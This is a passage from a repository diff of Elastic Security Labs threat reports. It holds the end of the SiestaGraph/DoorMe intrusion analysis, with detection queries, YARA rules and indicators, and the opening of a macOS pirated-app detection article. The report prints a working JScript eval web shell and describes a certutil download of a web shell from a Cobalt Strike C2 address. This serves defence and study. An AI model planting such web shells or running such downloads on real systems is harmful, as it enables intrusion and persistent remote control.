can be challenging for organizations as there is usually low visibility in terms of monitoring and a lack of prevention capabilities on these types of endpoints. In order to install this backdoor, it requires administrator rights and for the module to be placed inside the **%windir%\\System32\\inetsrv** directory, based on the observed artifacts we believe initial access was gained through server exploitation from a recent wave of Microsoft Exchange RCE exploit usage.\n\nThe malicious module (C++ DLL) is first loaded through its export, [RegisterModule](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/pfn-registermodule-function). This function is responsible for setting up the event handler methods and dynamically resolving API libraries for future usage. The main functionality of the backdoor is implemented using the [CGlobalModule class](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-class) under the event handler [OnGlobalPreBeginRequest](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-onglobalprebeginrequest-method). By overriding this event handler, the malware is loaded before a request enters the pipeline. The core functionality of the backdoor all exists in this function, including cookie validation, parsing commands, and calling underlying command functions.\n\n\n\nThe malware implements an authentication mechanism based on a specific cookie name that contains the authentication key. This malicious IIS module checks for every incoming HTTP request for the specified cookie name, and it returns a success message in case of a GET request. The GET request is used as a way to test the backdoor’s status for the operator, and it also returns back the username and hostname of the impacted machine. Commands can be passed to the backdoor through POST requests as data.\n\n\n\nThroughout our analysis, we discovered old samples on VirusTotal relating to this backdoor. Although they have the same authentication and logic, they implement different functionalities. The cookie name used for authentication was also changed alongside the handled commands.\n\nThis observed backdoor implements four different commands, and the symbol PIPE is used to separate the command ID and its arguments.\n\n| ID | Parameter | Description |\n| ---- | ----------------------------------- | --------------------------------------------------------------------------------------------------------------- |\n| 0x42 | Expects the string GenBeaconOptions | Generates a unique Globally Unique Identifier used to identify the infected machine and send it to the attacker |\n| 0x43 | Shellcode blob | Execute the shellcode blob passed as a parameter in the current process |\n| 0x44 | N/A | Write and Read from a specified named pipe |\n| 0x63 | Shellcode blob in chunks | Similar to command ID: 0x43, this command can receive a blob of shellcode in chunks when fully received |\n\nFrom our analysis, it appears that this simplistic backdoor is used as a stage loader. It uses NT Windows APIs, mainly **NtAllocateVirtualMemory** , **NtProtectVirtualMemory** , and **NtCreateThreadEx** , to allocate the required shellcode memory and to create the executing thread.\n\n#### kk2.exe\n\nOn November 30, 2022, an unknown binary called **kk2.exe** was executed on an Exchange server. While we have been unable to collect **kk2.exe** as of this writing, we can see that it was used to load a vulnerable driver that can be used to monitor and terminate processes from kernel mode, **mhyprot.sys**. It is unclear if **mhyprot.sys** is downloaded, or embedded into, **kk2.exe**.\n\n\n\n**mhyprot.sys** was detected by Elastic’s open code [Windows.VulnDriver.Mhyprot YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_VulnDriver_Mhyprot.yar), released in August 2022.\n\n> For more information on how vulnerable drivers are used for intrusions, check out the [Stopping Vulnerable Driver Attacks](https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks) research Joe Desimone published in September 2022.\n\nAs stated previously, we could not collect **kk2.exe** for analysis but it is likely that it used **mhyprot.sys** to escalate to kernel mode as a way to monitor, and if necessary, terminate processes. This could be used as a way of protecting an implant, or entire intrusion, from detection.\n\n#### Web shells\n\nThe following section highlights multiple attempts by the threat actors to install a web shell as a back door into the environment if they are evicted. While speculative in nature, it appears that most of these attempts to load web shells failed. It is unclear what the reasons for the failures are. We’ll not cover every attempt at loading a web shell, as several of them were very similar, but we’ll highlight the shifts in approaches.\n\nThe first attempt was to use the Microsoft **certutil** tool to download an Active Server Pages (ASPX) file ( **config.aspx** ) from a remote host (**185.239.70[.]229**) and save it as the **error.aspx** page on the Exchange Control Panel’s webserver. Because this IP address is a [known](https://threatfox.abuse.ch/ioc/1023850/) Cobalt Strike server, it may have been blocked by network defense architecture, leading to further attempts to overwrite **error.aspx**.\n\n\n\nAfter attempting to use **config.aspx** from a Cobalt Strike C2 server, the threat actors attempted to insert Base64 encoded Javascript into a text file ( **1.txt** ), use **certutil** to decode the Base64 encoded Javascript ( **2.aspx** ), and then overwrite **error.aspx** with **2.aspx**. This was attempted on both the Exchange Control Panel and Outlook Web Access web servers.\n\n\n\nThe Base64 encoded string decoded into the following Javascript:\n\n```\n<%@ Page Language=\"Jscript\" Debug=true%>\n<%\nvar TNKY='nHsXLMPUSCABolxOgKWuIFeGVimhEjyzQrTvRcwafZdJDktqYpbN';\nvar ZZXG=Request.Form(\"daad\");\nvar VAXN=TNKY(7) + TNKY(0) + TNKY(2) + TNKY(10) + TNKY(21) + TNKY(22);\neval(ZZXG, VAXN);\n%\n```\n\nThe preceding code is a simple web shell leveraging the [eval Method]()to evaluate JScript code sent through the POST parameter **daad**. Variations of this technique were attempted multiple times. Other attempts were observed to load [obfuscated versions](https://github.com/ysrc/webshell-sample/blob/master/aspx/54a5620d4ea42e41beac08d8b1240b642dd6fd7c.aspx#L11) of the [China Chopper](https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper) and [Godzilla](https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell) [web shells](https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx).\n\n### December 1–4, 2022\n\n### DLL side-loading\n\nOn December 2, 2022, on two Domain Controllers, we observed a new DLL ( **log.dll** ) being side loaded by a legitimate, but an 11-year-old, version of the Bitdefender Crash Handler executable (compiled name: **BDReinit.exe** ), **13802 AR.exe**. Once executed, it will move to the **C:\\ProgramData\\OfficeDriver\\*\\* directory, rename itself **svchost.exe\\*\\* , and install itself as a service.\n\nOnce **log.dll** is loaded, it will spawn the Microsoft Windows Media Player ( **wmplayer.exe** ) and **dllhost.exe** and injects into them which triggers a memory shellcode detection.\n\n_Updated 2/2/2023: In our_ [_updated research into SIESTAGRAPH, DOORME, and SHADOWPAD_](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns)_, we identify_ _ **log.dll** _ _as part of the SHADOWPAD malware family._\n\nOn December 2, 2022, another unknown DLL, **Loader.any** , was interactively executed with an Administrative account using **rundll32.exe**. **Loader.any** was observed executing two times on a Domain Controller and was then deleted interactively.\n\nOn December 3, 2022, we observed another malicious file, **APerfectDayBase.dll**. While this is a known malicious file, the execution was not observed. **APerfectDayBase.dll** is the legitimate name of a DLL in the import table of a benign-looking program, **AlarmClock.exe**.\n\n\n\nThis naming appears to be an attempt to make the malicious DLL look legitimate and likely to leverage **AlarmClock.exe** as a side-loading target. Testing has confirmed that the DLL can be side-loaded with **AlarmClock.exe**. While not malicious, we are including the hash for **AlarmClock.exe** in the Indicators table as its presence could be used purely as a side-loading vehicle for malicious DLL, **APerfectDayBase.dll**.\n\n## Victimology and targeting motivations\n\n### Diamond model\n\nElastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.\n\n\n\n### Victimology\n\nThe victim is the foreign ministry of a nation in Southeast Asia. The threat actor appeared to focus priority intelligence collection efforts on personnel and positions of authority related to the victim's relationship with [ASEAN](https://asean.org/what-we-do) (Association of Southeast Asian Nations).\n\nASEAN is a regional partnership union founded in 1967 to promote intergovernmental cooperation among member states. This has been expressed through economic, security, trade, and educational cooperation with expanding international and domestic significance for partner nations. The union itself has expanded to 10 member countries with 2 more currently seeking accession. It is exerting this international influence over the development of a [Regional Comprehensive Economic Partnership](https://rcepsec.org/about/) trade agreement with a broader periphery of member nations (16 members and 2 applicants).\n\n\n\nBelow is a list of the targeted users, the collection window(s) in which their mailboxes were exported, and the date their mailboxes were exported.\n\n| User | Collection Window | Collection Date(s) |\n| ------- | --------------------------------------------- | ------------------- |\n| User 1 | 11/1/2022 - 11/28/202211/29/2022 - 12/6/2022 | 11/28/202212/6/2022 |\n| User 2 | 11/1/2022 - 11/28/2022 | 11/28/2022 |\n| User 3 | 11/1/2022 - 11/28/2022 | 11/28/2022 |\n| User 4 | 11/15/2022 - 11/28/2022 | 11/28/2022 |\n| User 5 | 11/15/2022 - 11/28/202211/29/2022 - 12/6/2022 | 11/28/202212/6/2022 |\n| User 6 | 11/15/2022 - 11/28/2022 | 11/28/2022 |\n| User 7 | 11/15/2022 - 11/28/202211/29/2022 - 12/6/2022 | 11/28/202212/6/2022 |\n| User 8 | 11/15/2022 - 11/28/2022 | 11/28/2022 |\n| User 9 | 11/15/2022 - 11/28/2022 | 11/28/2022 |\n| User 10 | 9/15/2022 - 11/29/2022 | 11/29/2022 |\n| User 11 | 9/15/2022 - 11/29/2022 | 11/29/2022 |\n| User 12 | 9/15/2022 - 11/29/2022 | 11/29/2022 |\n| User 13 | 9/1/2022 - 11/30/2022 | 11/30/2022 |\n| User 14 | 9/1/2022 - 11/30/2022 | 11/30/2022 |\n| User 15 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 16 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 17 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 18 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 19 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 20 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 21 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 22 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 23 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n| User 24 | 11/29/2022 - 12/6/2022 | 12/6/2022 |\n\nAs reflected above, we observed Users 1, 5, and 7 targeted twice each indicating that the contents of their mailboxes were of particular interest. This could be the result of pre-intrusion reconnaissance or once the initial traunch of mailboxes was reviewed by the threat actor, they decided to continue collecting on those users.\n\n### Targeting motivation\n\nThere is no indication this victim would provide any direct monetary benefit to an adversary. The attack appears to be motivated by the purpose of diplomatic intelligence gathering. There are a number of potential adversaries who would find a nation’s confidential diplomatic communications related to ASEAN, and by extension the RCEP, to be highly advantageous in furthering their own regional influence, national security, and domestic goals.\n\nIf the threat actor is excluded from ASEAN trade unions and depends on foreign aid from members of those trade unions, it could find confidential diplomatic information specifically related to ASEAN useful for negotiating or renegotiating trade agreements.\n\nASEAN member nations are rival claimants to territorial disputes in the South China Sea (SCS). ASEAN as an organization has not produced a unified front in the SCS dispute, with some members preferring direct nation-to-nation negotiations and some wanting ASEAN to negotiate as a whole. Diplomatic information from ASEAN member nations might provide the threat actor with useful information to influence decisions and negotiations around the SCS. The threat actor's interest in ASEAN and any individual member would almost certainly be multifaceted covering government functions from immigration to agriculture, to technology, to sociopolitical considerations such as human rights.\n\n## Detection logic\n\n### Prevention rules\n\n- [Potential Masquerading as SVCHOST](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_svchost.toml)\n- [Binary Masquerading via Untrusted Path](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml)\n- [Process Execution from an Unusual Directory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml)\n\n### Detection rules\n\n- [Potential Credential Access via DCSync](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_dcsync_replication_rights.toml)\n- [Windows Service Installed via an Unusual Client](https://github.com/elastic/detection-rules/blob/main/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml)\n- [Suspicious Microsoft IIS Worker Descendant](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_suspicious_microsoft_iis_worker_descendant.toml)\n- [Encrypting Files with WinRar or 7z](https://github.com/elastic/detection-rules/blob/main/rules/windows/collection_winrar_encryption.toml)\n- [Exporting Exchange Mailbox via PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/collection_email_powershell_exchange_mailbox.toml)\n- [Windows Network Enumeration](https://github.com/elastic/detection-rules/blob/main/rules/windows/discovery_net_view.toml)\n- [NTDS or SAM Database File Copied](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml)\n- [Suspicious CertUtil Commands](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_suspicious_certutil_commands.toml)\n\n### Hunting queries\n\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.\n\n#### KQL query\n\nUsing the Discover app in Kibana, the below query will identify loaded IIS modules that have been identified as malicious by Elastic Defend (even if Elastic Defend is in “Detect Only” mode).\n\nThe proceeding and preceding wildcards (\\*) can be an expensive search over a large number of events.\n\n```\nevent.code : “malicious_file” and event.action : \"load\" and process.name : “w3wp.exe” and process.command_line.wildcard : (*MSExchange* or *SharePoint*)\n```\n\n#### EQL queries\n\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for behaviors similar to the SiestaGraph backdoor and the observed DLL side-loading patterns.\n\n```\n# Hunt for DLL Sideloading using the observed DLLs:\n\nlibrary where\n dll.code_signature.exists == false and\n process.code_signature.trusted == true and\n dll.name : (\"log.dll\", \"APerfectDayBase.dll\") and\n process.executable :\n (\"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\ProgramData\\\\*\")\n\n# Hunt for scheduled task or service from a suspicious path:\n\nprocess where event.type == \"start\" and\n process.executable : (\"?:\\\\Windows\\\\Tasks\\\\*\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\ProgramData\\\\Microsoft\\\\*\") and\n (process.parent.args : \"Schedule\" or process.parent.name : \"services.exe\")\n\n# Hunt for the SiestaGraph compiled file name and running as a scheduled task:\n\nprocess where event.type == \"start\" and\n process.pe.original_file_name : \"windowss.exe\" and not process.name : \"windowss.exe\" and process.parent.args : \"Schedule\"\n\n# Hunt for unsigned executable using Microsoft Graph API:\n\nnetwork where event.action == \"lookup_result\" and\n dns.question.name : \"graph.microsoft.com\" and process.code_signature.exists == false\n```\n\n### YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the [SiestaGraph malware implant](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SiestaGraph.yar) and the [DoorMe IIS backdoor](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_DoorMe.yar).\n\n```\nrule Windows_Trojan_DoorMe {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-12-09\"\n last_modified = \"2022-12-15\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"DoorMe\"\n threat_name = \"Windows.Trojan.DoorMe\"\n reference_sample = \"96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f\"\n strings:\n $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? }\n $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }\n $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? }\n $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? }\n $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 }\n $str_0 = \".?AVDoorme@@\" ascii fullword\n condition:\n 3 of ($seq*) or 1 of ($str*)\n}\n\nrule Windows_Trojan_SiestaGraph {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-12-14\"\n last_modified = \"2022-12-15\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"SiestaGraph\"\n threat_name = \"Windows.Trojan.SiestaGraph\"\n reference_sample = \"50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54\"\n strings:\n $a1 = \"downloadAsync\" ascii nocase fullword\n $a2 = \"UploadxAsync\" ascii nocase fullword\n $a3 = \"GetAllDriveRootChildren\" ascii fullword\n $a4 = \"GetDriveRoot\" ascii fullword\n $a5 = \"sendsession\" wide fullword\n $b1 = \"ListDrives\" wide fullword\n $b2 = \"Del OK\" wide fullword\n $b3 = \"createEmailDraft\" ascii fullword\n $b4 = \"delMail\" ascii fullword\n condition:\n all of ($a*) and 2 of ($b*)\n}\n```\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Reconnaissance](https://attack.mitre.org/tactics/TA0043/)\n- [Initial access](https://attack.mitre.org/tactics/TA0001)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Defense evasion](https://attack.mitre.org/tactics/TA0005)\n- [Credential access](https://attack.mitre.org/tactics/TA0006)\n- [Discovery](https://attack.mitre.org/tactics/TA0007)\n- [Lateral movement](https://attack.mitre.org/tactics/TA0008/)\n- [Collection](https://attack.mitre.org/tactics/TA0009)\n- [Command and control](https://attack.mitre.org/tactics/TA0011)\n\n### Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Gather host information](https://attack.mitre.org/techniques/T1592/)\n- [Gather victim information](https://attack.mitre.org/techniques/T1589/)\n- [Gather victim network information](https://attack.mitre.org/techniques/T1590/)\n- [Gather victim org information](https://attack.mitre.org/techniques/T1591/004/)\n- [Exploit public-facing application](https://attack.mitre.org/techniques/T1190/)\n- [Command and Scripting Interpreter: Windows command-shell](https://attack.mitre.org/techniques/T1059/001/)\n- [Command and Scripting Interpreter: Powershell](https://attack.mitre.org/techniques/T1059/003/)\n- [Network share discovery](https://attack.mitre.org/techniques/T1135/)\n- [Remote system discovery](https://attack.mitre.org/techniques/T1018/)\n- [File and directory discovery](https://attack.mitre.org/techniques/T1083/)\n- [Process discovery](https://attack.mitre.org/techniques/T1057/)\n- [Remote services: SMB/Windows admin shares](https://attack.mitre.org/techniques/T1021/002/)\n- [System service discovery](https://attack.mitre.org/techniques/T1007/)\n- [System owner/user discovery](https://attack.mitre.org/techniques/T1033/)\n- [Hijack execution flow: DLL side-loading](https://attack.mitre.org/techniques/T1574/002/)\n- [Masquerading: Masquerade task or service](https://attack.mitre.org/techniques/T1036/004/)\n- [Process injection](https://attack.mitre.org/techniques/T1055/)\n- [Indicator removal: File deletion](https://attack.mitre.org/techniques/T1070/004/)\n- [Deobfuscate/decode files or information](https://attack.mitre.org/techniques/T1140/)\n- [Virtualization/sandbox evasion: Time based Evasion](https://attack.mitre.org/techniques/T1497/003/)\n- [OS credential dumping: NTDS](https://attack.mitre.org/techniques/T1003/003/)\n- [OS credential dumping: Security Account Manager](https://attack.mitre.org/techniques/T1003/002/)\n- [OS credential dumping: DCSync](https://attack.mitre.org/techniques/T1003/006/)\n- [Create or modify system process: Windows service](https://attack.mitre.org/techniques/T1543/003/)\n- [Scheduled task/job: Scheduled task](https://attack.mitre.org/techniques/T1053/005/)\n- [Valid accounts](https://attack.mitre.org/techniques/T1078/)\n- [Server software component: IIS components](https://attack.mitre.org/techniques/T1505/004/)\n- [Server software component: Web shell](https://attack.mitre.org/techniques/T1505/003/)\n- [Email collection: Local email collection](https://attack.mitre.org/techniques/T1114/001/)\n- [Archive collected data: Archive via utility](https://attack.mitre.org/techniques/T1560/001/)\n- [Screen capture](https://attack.mitre.org/techniques/T1113/)\n- [Web service](https://attack.mitre.org/techniques/T1102/)\n- [Application layer protocol: Web protocols](https://attack.mitre.org/techniques/T1071/001/)\n\n## References\n\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme](https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme)\n- [https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks](https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks)\n- [https://threatfox.abuse.ch/ioc/1023850/](https://threatfox.abuse.ch/ioc/1023850/)\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper](https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper)\n- [https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell](https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell)\n- [https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx](https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx)\n\n## Observables\n\nAll observables are also available [for download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc0eb869ac242975f/637bf8b1fa033a109b5d94bd/ref4526-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Indicator | Type | Name | Reference |\n| ---------------------------------------------------------------- | ------- | --------------------------------------- | --------------------------------------------------------- |\n| 1a87e1b41341ad042711faa0c601e7b238a47fa647c325f66b1c8c7b313c8bdf | SHA-256 | OfficeClient.exe and OfficeCore.exe | SIESTAGRAPH |\n| 7fc54a287c08cde70fe860f7c65ff71ade24dfeedafdfea62a8a6ee57cc91950 | SHA-256 | Officeclient.exe | SIESTAGRAPH |\n| f9b2b3f7ee55014cc8ad696263b24a21ebd3a043ed1255ac4ab6a63ad4851094 | SHA-256 | officeup.exe | SIESTAGRAPH |\n| c283ceb230c6796d8c4d180d51f30e764ec82cfca0dfaa80ee17bb4fdf89c3e0 | SHA-256 | Microsoft.Exchange.Entities.Content.dll | DOORME |\n| 4b7d244883c762c52a0632b186562ece7324881a8e593418262243a5d86a274d | SHA-256 | iisrehv.dll | SessionManager |\n| 54f969ce5c4be11df293db600df57debcb0bf27ecad38ba60d0e44d4439c39b6 | SHA-256 | kk2.exe | mhyprot.sys loader |\n| 509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6 | SHA-256 | mhyprot.sys | vulnerable driver |\n| 386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd | SHA-256 | 13802 AR.exeBDReinit.exe | vulnerable Bitdefender Crash Handler |\n| 452b08d6d2aa673fb6ccc4af6cebdcb12b5df8722f4d70d1c3491479e7b39c05 | SHA-256 | log.dll | SHADOWPAD |\n| 5be0045a2c86c38714ada4084080210ced8bc5b6865aef1cca658b263ff696dc | SHA-256 | APerfectDayBase.dll | malicious DLL injected into vulnerable binaries |\n| 3f5377590689bd19c8dd0a9d46f30856c90d4ee1c03a68385973188b44cc9ab7 | SHA-256 | AlarmClock.exe | benign, but targeted for side-loading APerfectDayBase.dll |\n| f2a9ee6dd4d1ceb4d97138755c919549549311c06859f236fc8655cf38fe5653 | SHA-256 | Loader.any | currently unknown DLL |\n| 3b41c46824b78263d11b1c8d39cfe8c0e140f27c20612d954b133ffb110d206a | SHA-256 | Loader.any | currently unknown DLL |\n| 9b66cd1a80727882cfa1303ada37019086c882c9543b3f957ee3906440dc8276 | SHA-256 | Class1.exe | currently unknown file |\n| 185.239.70.229 | ipv4 | na | Cobalt Strike C2 |\n"
+ },
+ "title": "SiestaGraph: New implant uncovered in ASEAN member foreign ministry",
+ "slug": "siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry",
+ "subtitle": "Elastic Security Labs is tracking an active intrusion, by likely multiple threat actors, into the Foreign Affairs office of an ASEAN member.",
+ "date": "2022-12-16",
+ "description": "Elastic Security Labs is tracking likely multiple on-net threat actors leveraging Exchange exploits, web shells, and the newly discovered SiestaGraph implant to achieve and maintain access, escalate privilege, and exfiltrate targeted data.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "devon-kerr"
+ }
+ ],
+ "image": "photo-edited09.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "ref2924",
+ "siestagraph",
+ "doorme"
+ ]
+ },
+ "id": "security_labs_content-siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sinking_macos_pirate_ships-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sinking_macos_pirate_ships-md.json
new file mode 100644
index 00000000000..fddd9ced631
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sinking_macos_pirate_ships-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Sinking macOS Pirate Ships with Elastic Behavior Detections\"\nslug: \"sinking-macos-pirate-ships\"\ndate: \"2024-03-15\"\ndescription: \"This research looks at a recently found macOS malware campaign using the macOS Endpoint Security Framework paired with the Elastic Agent to hunt and detect the behaviors this malware exhibits.\"\nauthor:\n - slug: colson-wilhoit\nimage: \"photo-edited-01@2x.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - macOS\n---\n\n## Preamble\n\nOn January 12, 2024, Malwrhunterteam, an X account that surfaces interesting malware samples, usually found via VirusTotal, released a [Tweet](https://twitter.com/malwrhunterteam/status/1745959438140297697) about a pirated macOS application that appeared to contain malicious capabilities. macOS security researcher Patrick Wardle quickly released a [write-up](https://objective-see.org/blog/blog_0x79.html) detailing the application’s malicious functionality, which included dropping second and third-stage payloads. Shortly after, the team at JAMF Threat Labs released a [blog](https://jamf.com/blog/jtl-malware-pirated-applications/) that captured several additional sibling samples that JAMF had been tracking before the Malwrhunterteam tweet, delving deep into the internals and core functionality this malware provides. If you have not read both of these great write-ups, there are a lot of helpful details and background information in these sources that will add context to the rest of this analysis.\n\nThis publication will not cover the malware internals or related samples. Instead, we will look to provide practical, resilient detection and threat hunting guidance that can enable you to alert on the actions taken by this, or similarly related, malware. Signature-based detections commonly fall short of such capabilities; however, we will highlight how our behavior rules deal with this.\n\nWe will be breaking down the malware's actions in each stage and analyzing how we can use the data from the macOS [Endpoint Security Framework (ESF)](https://developer.apple.com/documentation/endpointsecurity) and the Elastic Agent to build these detections. Let's dig in.\n\n\n\n\n## UltraEdit\n\nThe [UltraEdit](https://www.ultraedit.com/) application (a legitimate text and hex editor) was pirated (altered and then abused to facilitate malware distribution) along with several other applications and distributed via a disk image file (`.dmg`). \n\nUpon executing the pirated version of the application, it immediately loads a 3rd party, _unsigned_ dylib (macOS shared library) called `libConfigurer64.dylib`. This dylib acts as a dropper whose goal is to download and execute follow-on payloads. The dylib downloads and executes two hidden files: `/private/tmp/.test` and `/Users/Shared/.fseventsd`. \n\nLooking at the initial actions taken by the application, we can see the unsigned 3rd party dylib load takes place immediately post-execution in the Analyzer View of the Elastic Security Solution. This is an important event to focus on because it is the only non-system library loaded. \n\n\n\n\nIn version 8.11, Elastic Defend introduced a first-of-its-kind dylib load event for the macOS Elastic Agent, allowing us to capture library loads and details regarding those libraries, such as dylib signature data. With this powerful new visibility, we can quickly build an [Event Query Language (EQL)](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) query that looks for unsigned dylib loads from a volume mount or the applications directory structure. \n\n**Rule Name: Application Unsigned Dylib Load**\n```\nlibrary where event.action == \"load\" and dll.path : \n(\"/Volumes/*.app/Contents/*\", \"/Applications/*.app/Contents/*\") \nand dll.code_signature.exists == false\n```\n\n\n\n\nWe can and should take this a step further to identify only untrusted or unsigned processes that are loading an unsigned library. This will reduce the amount of false positives and still accurately capture the event taking place.\n\n**Rule Name: Unsigned or Untrusted Application Unsigned Dylib Load**\n```\nlibrary where event.action == \"load\" and \n(process.code_signature.exists == false or process.code_signature.trusted == false) \nand dll.path : (\"/Volumes/*.app/Contents/*\", \"/Applications/*.app/Contents/*\") and \ndll.code_signature.exists == false\n```\n\nWe now have a behavior-based detection that triggers on the unsigned process that loads the unsigned dylib and alerts us to its presence. \n\nLet’s look at the additional payloads and their actions to see if we can build any additional detections.\n\n### .test\n\nThe `.test` binary gets 